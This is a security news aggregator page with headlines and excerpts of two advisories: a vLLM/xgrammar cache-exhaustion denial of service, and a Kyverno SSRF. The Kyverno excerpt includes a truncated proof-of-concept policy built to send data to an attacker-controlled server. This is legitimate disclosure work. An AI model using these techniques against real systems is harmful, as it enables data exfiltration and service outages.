Security

Latest News

Here’s What Happened to Those SignalGate Messages

A lawsuit over the Trump administration’s infamous Houthi Signal group chat has revealed what steps departments took to preserve the messages—and how little they actually saved.

Wired
GHSA-hf3c-wxg2-49q9: vLLM vulnerable to Denial of Service by abusing xgrammar cache

### Impact

This report is to highlight a vulnerability in XGrammar, a library used by the structured output feature in vLLM. The XGrammar advisory is here: https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-389x-67px-mjg3

The [xgrammar](https://xgrammar.mlc.ai/docs/) library is the default backend used by vLLM to support structured output (a.k.a. guided decoding). Xgrammar provides a required, built-in cache for its compiled grammars stored in RAM. xgrammar is available by default through the OpenAI compatible API server with both the V0 and V1 engines.

A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service by consuming all of the system's RAM.

Note that even if vLLM was configured to use a different backend by default, it is still possible to choose xgrammar on a per-request basis using the `guided_decoding_backend` key of the `extra_body` field ...

GHSA-459x-q9hg-4gpq: Kyverno vulnerable to SSRF via Service Calls

### Summary

An attacker with the ability to create Kyverno policies in a Kubernetes cluster can use Service Call functionality to perform SSRF to a server under their control in order to exfiltrate data.

### Details

According to the documentation, Service Call is intended to address services located inside the Kubernetes cluster, but this method can also resolve external addresses, which allows making requests outside the Kubernetes cluster. https://kyverno.io/docs/writing-policies/external-data-sources/#variables-from-service-calls

### PoC

Create a slightly modified Cluster Policy from the documentation. In the url we specify the address of a server controlled by the attacker, for example Burp Collaborator.

```yaml
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: check-namespaces
spec:
  rules:
  - name: call-extension
    match:
      any:
      - resources:
          kinds:
          - ConfigMap
    context:
    - name: result
      apiCall:
        method: P...
```

Operation BULUT: Encrypted Chats from Sky ECC, ANOM Lead to 232 Arrests

Intelligence from encrypted platforms like Sky ECC and ANOM has led to the arrest of 232 individuals and…

Max Severity Bug in Apache Roller Enabled Persistent Access

The remediated flaw gave adversaries a way to maintain access to the app through password resets.

With AI's Help, Bad Bots Are Taking Over the Web

Bad bots are becoming increasingly difficult to detect as they more easily mimic human behaviors and utilize evasion techniques, researchers say.

AI-Powered Presentation Tool Leveraged in Phishing Attacks

Researchers at Abnormal Security said threat actors are using a legitimate presentation and graphic design tool named "Gamma" in phishing attacks.

Best Crypto Tax Software in 2025: A Comprehensive Guide

Keeping up with crypto tax laws in Europe feels like a constant hurdle. Regulations evolve, tax authorities demand…

4chan Breached? Hacker from Rival Soyjak Forum Claims Source Code Leak

4chan is down amid claims from a rival Soyjak forum user who says they’ve breached the site and…

Suspected 4chan Hack Could Expose Longtime, Anonymous Admins

Though the exact details of the situation have not been confirmed, community infighting seems to have spilled out in a breach of the notorious image board.